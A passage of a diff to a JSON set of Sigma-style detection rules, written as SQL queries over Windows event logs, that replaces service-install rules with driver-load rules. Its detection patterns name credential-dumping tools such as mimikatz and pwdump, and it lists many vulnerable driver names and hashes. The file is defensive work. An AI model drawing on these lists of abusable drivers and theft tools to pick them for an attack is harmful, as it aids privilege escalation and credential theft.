Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_pcap_drivers.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS 
driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": "aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' 
OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', 
'3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", - "status": "experimental", + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ 
@@ -3821,351 +3745,231 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": 
"1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" - ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" - }, - { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", - "status": "experimental", - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Legitimate usage of the anydesk tool" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" - ], - "filename": "win_system_service_install_anydesk.yml" - }, - { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN 
('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "description": "Detects the load of known vulnerable drivers via their names only.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE 